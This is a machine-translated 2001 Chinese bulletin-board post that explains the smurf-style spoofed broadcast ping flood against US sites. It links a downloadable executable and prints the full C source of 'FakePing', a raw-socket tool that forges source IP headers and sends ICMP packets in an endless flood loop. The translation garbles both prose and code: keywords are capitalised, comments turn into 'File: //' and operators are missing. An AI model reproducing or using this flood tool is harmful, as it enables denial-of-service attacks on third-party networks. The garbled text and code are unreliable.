Sending station: BBS Shuimu Tsinghua Station (Fri May 11 22:26:59 2001)
Author: shotgun
Recently, many people come to call everyone to go to ping, what website, politics, I don't understand, but from the technical point of view, no matter what refused service attack, one condition needs to be met: Use the least resource to exchange the attacker Consumption. Like this, everyone goes to ping is not only weird: exchange the other party's minimum?
Injury; it is also a ridiculous: the people's war is probably
More than 50 years ago, in the Internet era, it is not how much more people.
A basic understanding: the center of the Internet in the United States, China's part is just a small branch of the Internet ((that is, the concept of a metropolitan area network in the United States), our cable to North America is called "North America Export ", what does it mean? The door is, in other words, it is a bottleneck, so everyone picks to ping?
First death is China's export gateway (North China
The beauty exit bandwidth is just GB level, very wide? Did you swindle with your family? ), Of course, North America is going to rest, we obviously do not see the US website, like to do Aq, may wish to say to others: "The United States is blown up!" (Strange? But it is not Have yourself a white house "Black" page to
Is it like this? It is better to turn off the country.
, Disconnect the Internet, you have a strong dream at home, imagine that we are still in a powerful Tang Dynasty, come from all over the world to worship?
Gossip less, we are today, ping is a tool that exhibits whether the network host exists by sending ICMP packets (Type 8 Code 0). For a long time, a part of the operating system (such as Win95) can not be treated Excessive PING package, resulting in ping to
Death's attack mode (with big ping packs to collapse each other or stuffed network), with the upgrade of the operating system, network bandwidth upgrade, computer hardware upgrade, current, big ping package basically does not have a big attack effect (distribution Except for attacks), if you must use the ping package to attack other hosts unless you use the TCP / IP protocol?
Other features or defects of network topology
Big attack strength (so-called positive feedback)
Under normal circumstances, the PING process is like this:
Host A Send ICMP 8,0 messages to host B
Camouflage for host C error reply
Host A ---------------------> Host B -----------------> Host C
In this case, since the host A only needs to constantly send the ping packet without the need to process the return echoreply, the attack power is doubled, and it is actually the host B and host C are the target of attack, and?
Will you leave your own traces, is a hidden method of hidden stone blessings.
The above method can be easily implemented with SOCK_RAW camouflage IP, but even if it is twice as much as it is more powerful, it is not seen how much the effect is, and how much is it? Not well, let the enemy gave us great, there is a concept called broadcast in TCP / IP, the so-called broadcast meaning?
Will receive messages sent to this address (just like radio broadcasts), if? ? That's right! If we send an ICMP to the broadcast address
Echo packet (already ping broadcast address), the result will get a lot of response, Each of the Ethernet allows reception of broadcasted packets to respond to an ICMP_ECHOREPLY, if you want to test, you can ping on the Unix machine. Your LAN's broadcast address will see a lot of responding DUP packets, which is repeated because Microsoft's ping program is not unpacking multiple responses. After receiving the first package, it will be discarded behind, the same Microsoft soft The system does not respond to the package of the broadcast address by default, so you'd better test in a large number of UNIX hosts?
Speaking here, smart you must know what I want to do? Oh, yes, when we disguise the host machine to send a PING request to a broadcast address, all the hosts in this broadcast address respond to this ping request (of course, it is responding to the host, everyone thinks Is it ping?), This way,?
Respond the number of hosts of the ping package)
I wrote a FakePing tool that can be loaded under http://www.patching.net/shotgun/fakeping.exe, using the method is fakeping.exe fakeip targetip
[Packetsize], if targetip is a broadcast address, FAKEIP is an attack target.
The source code is announced as follows: (written in a hurry, the code is more chaotic, laughing) * /
//
///
// fakeping for win2k by shotgun //
///
// Released: [2001.4] //
// Author: [Shotgun] //
// HomePage: //
// [http://it.xici.net] //
// [http://www.patch "//////////
///
//
#include
#include
#include
#include
#define seq 0x28376839
#define status_failed 0xffff File: // Error return value
Typedef struct _iphdr file: // Define IP headers
{
Unsigned char h_verlen; file: // 4 head length, 4-digit IP version number
Unsigned char TOS; File: // 8-bit service type TOS
Unsigned short total_len; file: // 16-bit total length (bytes)
UNSIGNED SHORT IDENT; File: // 16 Limits Unsigned Short Frag_and_Flags; File: // 3 Bit Number Unsigned Char Ttl; File: // 8 Bit Survival Time TTL
Unsigned char proto; file: // 8-bit protocol (TCP, UDP or other)
UNSIGNED Short Checksum; File: // 16-bit IP header checksum
Unsigned int sourceip; file: // 32 bitsource IP address
Unsigned int desip; file: // 32 bit ip address
} Ip_header;
//
/ / Define ICMP's head
Typedef struct _ihdr
{
Byte I_TYPE; File: // 8-bit type
Byte i_code; file: // 8 bit code
Ushort i_cksum; file: // 16-bit checksum
Ushort i_id; file: // Identification number (generally used process number as identification number)
Ushort i_seq; file: // message serial number
Ulong timestamp; file: // Timestamp
ICMP_HEADER;
File: // Checksum: Subfremers for calculating the checksum
Ushort Checksum (Ushort * Buffer, int size)
{Unsigned long cksum = 0; while (size> 1) {cksum = * buffer ;
Size - = SizeOf (Ushort);
}
IF (size) {
CKSUM = * (Uchar *) BUFFER;
}
CKSUM = (CKSUM >> 16) (CKSUM & 0xFFF);
CKSUM = (CKSUM >> 16);
Return (Ushort) (~ CKSUM);
}
FILE: // FAKEPING main function
INT main (int Argc, char ** argv)
{
Int DataSize, ErrorCode, Counter, Flag;
INT Timeout = 2000, SendSeq = 0, PacketSize = 32;
CHAR Sendbuf [65535] = {0};
Wsadata wsadata;
Socket SockRaw = (socket) NULL;
Struct SockAddr_in destaddr;
IP_HEADER IP_HEADER;
ICMP_HEADER ICMP_HEADER;
Char FakesourceIP [20], Destip [20];
File: // Accept command line parameters
IF (Argc <3)
{
Printf ("Fakeping By Shotgun / N");
Printf ("/ TTHIS Program Can Do Ping-Flooding From A Fakeip / N");
Printf ("/ Tusing a Broadcast IP as The Fakeip Will Enhance THE EFFECT / N");
Printf ("email: / n");
Printf ("/ tshotgun@xici.net/n");
Printf ("Homepage: / N");
Printf ("/thttp://it.xici.net/n");
Printf ("/thttp://www.patching.net/n");
Printf ("Usage: /n/tfakeding.exe fakesourceip destinationip [packetsize] / n");
Printf ("eXample: / n");
Printf ("/ TFAKEPING.EXE 192.168.15.23 192.168.15.255/N");
Printf ("/ TFAKEPING.EXE 192.168.15.23 192.168.15.200 6400 / n");
exit (0);
}
STRCPY (FakesourceIP, Argv [1]);
STRCPY (Destip, Argv [2]);
IF (Argc> 3) PacketSize = ATOI (Argv [3]);
IF (PacketSize> 60000)
{
Printf ("Error! Packet size Too Big, Must <60k / N");
exit (0);
}
Printf ("now fake% s ping% s using packet size =% d bytes / n",
FakesourceIP, Destip, PacketSize;
Printf ("/ tctrl c to quit / n");
File: // Initialize SOCK_RAW
IF ((ERRORCODE = WSAStartup (Makeword (2, 1), & WSADATA))! = 0)
{
FPrintf (stderr, "wsastartup failed:% d / n", erroorcode);
EXITPROCESS (STATUS_FAILED);
}
IF ((SockRaw = WSASASOCKET (AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED) == Invalid_socket
{
FPRINTF (stderr, "wsasocket () failed:% d / n", wsagetlasterror ());
EXITPROCESS (STATUS_FAILED);
}
Flag = true;
File: // Set IP_HDRINCL with your own IP head
ErrorCode = setsockopt (SockRaw, Ipproto_IP, IP_HDRINCL, (CHAR *) & flag, sizeof (int));
IF (ErrorCode == Socket_ERROR)
Printf ("SET IP_HDRINCL ERROR! / N");
__Try {
File: // Settings Send Timeout ErrorCode = Setsockopt (SockRaw, SOL_Socket, SO_SNDTIMEO, (CHAR *) & Timeout, SizeOf (Timeout);
IF (ErrorCode == Socket_ERROR)
{
FPRINTF (stderr, "failed to set send timeout:% d / n", wsagetlasterror ());
__leave;
}
MEMSET (& DestadDR, 0, Sizeof (Destaddr));
Destaddr.sin_family = af_INet;
Destaddr.sin_addr.s_addr = inet_addr (destip);
File: // Fill the first part of IP
IP_HEADER.H_VERLEN = (4 << 4 | sizeof (ip_header) / sizeof (unsigned long); file: // High four-digit IP saddle number,? Four first length
IP_HEADER.TOTAL_LEN = HTONS (IP_HEADER) SIZEOF (ICMP_HEADER)); File: // 16-bit total length ((byte?
IP_HEADER.IDENT = 1;
FILE: / / 16-bit identification
IP_HEADER.FRAG_AND_FLAGS = 0;
FILE: // 3 bits of sign
IP_HEADER.TTL = 128;
FILE: // 8-bit survival time TTL
IP_HEADER.PROTO = ipproto_ICMP;
File: // 8-bit protocol (TCP, UDP or other)
IP_HEADER.CHECKSUM = 0;
FILE: / / 16 IP header checksum
IP_HEADER.SOURCEIP = INET_ADDR (FAKESOURCEIP); File: // 32
FILE: // Bit source IP address
IP_HEADER.Destip = inet_addr (destip);
File: // 32 bit ip address
File: // Fill the first part of ICMP
ICMP_HEADER.I_TYPE = 8;
ICMP_HEADER.I_CODE = 0;
ICMP_HEADER.I_CKSUM = 0;
ICMP_HEADER.I_ID = 2;
ICMP_HEADER.TIMESTAMP = 999;
ICMP_HEADER.I_SEQ = 999;
Memcpy (Sendbuf, & ICMP_HEADER, SIZEOF (ICMP_HEADER));
MEMSET (Sendbuf SizeOf (ICMP_HEADER), 'E', PacketSize;
ICMP_HEADER.I_CKSUM = Checksum ((USHORT *) Sendbuf, sizeof (ICMP_HEADER) PacketSize;
Memcpy (sendbuf, & ip_header, sizeof (ip_header));
Memcpy (SENDBUF SIZEOF (IP_HEADER), & ICMP_HEADER, SIZEOF (ICMP_HEADER));
MEMSET (Sendbuf SizeOf (IP_HEADER) SIZEOF (ICMP_HEADER), 'E', PacketSize;
MEMSET (IP_HEADER) SIZEOF (ICMP_HEADER) PacketSize, 0, 1);
File: // Calculate the size of the send buffer
DataSize = SizeOf (IP_HEADER) SIZEOF (ICMP_HEADER) PacketSize;
IP_HEADER.CHECKSUM = Checksum ((USHORT *) Sendbuf, Datasize;
File: // Plip the send buffer
Memcpy (sendbuf, & ip_header, sizeof (ip_header));
While (1)
{
Sleep (100);
PRINTF (".");
For (counter = 0; counter <1024; counter )
{
File: // Send ICMP Packets
Errorcode = Sendto (SockRaw, Sendbuf, DataSize, 0, (Struct SockAddr *) & Destaddr, Sizeof (Destaddr));
IF (ErrorCode == Socket_ERROR) Printf ("/ Nsend Error:% D / N", getLastError ());
}
}
} // end of try
__finally {
IF (SockRaw! = Invalid_socket) CloseSocket (SOCKRAW);
WSACLEANUP ();
}
Return 0;
} / *
Conclusion:
Patriotism is necessary, especially the enthusiasm, but the technology is not to be half a little fake, there is no more impulse, it is necessary to rely on the old and old, and FakePing technology is not a new technology on the Internet, long time ago Americans who were cast by us were all achieved. How many people should we organize now? Relying on wisdom and knowledge of Aqui Mide, once used the mirror to protect your home, we still have to impulsive and Blind blind to strong people?
Less impulse and blind, more and hard, otherwise it is still hard.
Patching heroes ......
China
Relying on the wisdom and knowledge of Aqui, once used the mirror to protect his home, we must still rely on urgency and blind Destaddr);
Less impulse and blind, more and hard, otherwise it is still hard.
Patching heroes ......
China
Supplement date: 2001-05-06 11:16:07
The purpose of writing this article is not to call on the big house to attack the US site with FakePing tools, just want to show a slight show what can be done with technical skills?
If everyone is ping is the righteous group, the "knife gun is not entry" to fight the cannon, FakePing can only be a fire gun, and the United States has developed aircraft carrier (operating system). Is it used by a big knife, a long gun, a fire to buy blessing
This is very tragic, but there is no other way? Can we go back to develop your battleship?
If the second cannons are also coming out, if the technicians of Xichang also go to exercise, we don't wear the country!